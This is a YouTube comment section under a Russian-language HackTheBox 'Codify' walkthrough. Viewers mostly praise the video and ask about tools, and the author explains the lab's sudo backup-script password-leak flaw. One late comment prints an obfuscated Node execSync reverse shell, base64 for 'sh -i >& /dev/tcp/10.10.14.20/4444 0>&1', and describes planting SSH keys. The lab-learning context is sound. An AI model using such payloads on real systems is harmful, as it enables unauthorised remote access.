Прохождение

Рет қаралды 7,137

Mekan Bairyev - MrCyberSec

Күн бұрын

Пікірлер: 42

@lilkirill4407 7 ай бұрын

Редко пишу комменты, но это супер крутой контент. У меня появилось новое хобби)) Большое спасибо за проделанную работу.

@CamelCase-dg6xp 11 ай бұрын

Привет!! Очень классный канал, подача контента, прошу не забрасывайте его))) Я двухлетний девопс (бубернетесы ваши, пайплайны, автоматизация и.т.д), но с большим интересом смотрю в сетевую безопасность, пентест и всякие другие возможности вскрывания жоп. С интересом буду наблюдать за каналом

@lilkirill4407 7 ай бұрын

ровно такая же история))

@naushnikol 6 ай бұрын

Про бесплатные машины тоже расскажи. Контент супер!

@evgeniyp1976 6 ай бұрын

посмотрев другие видео, имя пользователя joshua в хэше сразу смутило ) контент топ, случайно нашел, оооочень доступно объясняется. спасибо.

@romanryaboshtan9270 11 ай бұрын

замечательно, продолжай то, что ты делаешь!!!

@robotiksillya8363 11 ай бұрын

прикольно давай еще

@zhuk 7 ай бұрын

просто кайф, больше таких видео!

@Super-fruja 11 ай бұрын

классно 🎉

@andrey6906 11 ай бұрын

Классный контент , продолжай в том же духе

@saber1in 11 ай бұрын

Продолжай в том же духе, отличный контент!

@yesipovdaniel4943 11 ай бұрын

Красавчик

@paulbond8244 11 ай бұрын

Шикарный контент!

@TheArtemus 11 ай бұрын

Не чего непонял, но залип

@okuzmenko 11 ай бұрын

Классное видео. Можете пожалуйста подсказать что у вас за клавиатура и на каких свичах? Очень классно звучит 😍

@Andrew-v4o7k 11 ай бұрын

плюсую, тоже заинтересовало)

@MrCyberSec 11 ай бұрын

Спасибо! Клава: Keychron K8 Pro QMK Свичи: Gateron G Pro Brown

@okuzmenko 11 ай бұрын

Большое спасибо!

@nuken-t5o 22 күн бұрын

Спасибо за видео. Зачем в начале видео добавлять айпишник в хостс? Просто открыть страницу по айпишнику могло не сработать?

@MrCyberSec 21 күн бұрын

Да, может не сработать, так как на HTB веб-сервисы часто настроены таким образом, что они работают только с определёнными доменными именами, связанными с виртуальными хостами. Если вы обращаетесь к такому сервису по IP или с неправильным именем хоста, он может не ответить

@nuken-t5o 21 күн бұрын

@@MrCyberSec Понял, спасибо

@ИванМозгачев-ф4л 7 ай бұрын

Скажите, а почему именно vim? почему нельзя использовать тотже nano? Или любые другие редакторы? Ну не прям "нельзя", а почему именно vim? Большая чать людей говорят - "Это олдсулько, профессионально и прочие симптомы" но никто не говорит почему все же vim. Есть ли у Вас свое мнение по этому вопросу?

@MrCyberSec 7 ай бұрын

Почему нельзя? Можно. Дело вкуса и привычек. Используйте нано, если нравится, это асболютно ОК.

@rezo4846 3 ай бұрын

Вим предоставляет очень удобное управление командами и хоткеями. И если в них разобраться, то скорость работы очень увеличится

@verchest3547 11 ай бұрын

Нужны ли углубленные знания по математике для инфо беза?

@MrCyberSec 11 ай бұрын

Скажу так: если нет углубленных знаний в математике, то это ниразу не повод отказываться преследовать путь инфобеза. Тут скорее про логическое мышление, чем про математику. Логику же развивать можно. Программирование - отличный способ!

@MrRussianuser 11 ай бұрын

А зачем вы делаете перебор пароля DB_PATH? Можно же просто написать sudo bash и делать что хотите (ну или sudo cat /root/.creds)

@MrCyberSec 11 ай бұрын

Из под sudo можно запускать лишь скрипт бекапа, это видно из аутпута команды sudo -l

@kldev8566 5 ай бұрын

откуда такое условие что charset для пароля только латинские буквы и цифры? где спецсимволы?

@dantesvss8036 11 ай бұрын

Что то на инопланетном языке.. наверное вы рассказывали, какой я тупой в .. хрен знает в чём))

@MrCyberSec 11 ай бұрын

@igorvlasiuk6432 10 ай бұрын

почему пароль от рута совпал с паролем от дб? ето и есть уязвимость?пароль один?

@MrCyberSec 10 ай бұрын

Пароль от дб совпал с паролем от рута, но нам демонстрировали другое. Уязвимость в возможности эксфильтровать этот самый пароль из-за корявого условия проверки пользовательского пароля с паролем из файла /root/.creds

@igorvlasiuk6432 10 ай бұрын

@@MrCyberSec ето я понял в bash script нельзя проверку через == делать. Просто если б пароль дб не совпал с паролем рута нужно было б продолжать что-то другое.

@MrCyberSec 10 ай бұрын

@@igorvlasiuk6432 Да, но в данном случае нам хотели продемонстрировать именно эту уязвимость и, так образом подведя к итогу машины. Есть машины сложнее уровнем и там так легко машины не заканчиваются:)

@kakarot2004-l2 11 ай бұрын

Can you provide penetrating test report for codify please 🙂

@MrCyberSec 11 ай бұрын

Yes, my writeup is here: maddevs.io/writeups/hackthebox-codify/

@kakarot2004-l2 11 ай бұрын

@@MrCyberSec I opened brother , but it shows like An error occurred in the application and your page could not be served. If you are the application owner, check your logs for details.

@MrCyberSec 11 ай бұрын

@@kakarot2004-l2 which country are you accessing it from? Might be your ISP blocking.. Try opening it with VPN. I recommend using CloudFlare WARP technology. It's free and secures your internet connection.

@kakarot2004-l2 11 ай бұрын

@@MrCyberSec india brother

@kakarot2004-l2 11 ай бұрын

@@MrCyberSec which server did i want to choose?

@olegovsyanikov9601 3 ай бұрын

кароч не было там папки .ssh (( создал сам записал ключ - не коннектит сделал шел с .execSync('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjAvNDQ0NCAwPiYx | base64 -d | bash'); где в хеше по сути sh -i >& /dev/tcp/10.10.14.20/4444 0>&1 зайти зашел и записал еще раз уже другой ключ но не коннектит ссх - с вербозом вот debug1: Authentications that can continue: publickey,password debug1: Next authentication method: password странно почему у вас была .ssh папка и по идее после изменения authorized_keys нужно делать ребут sshd разве нет?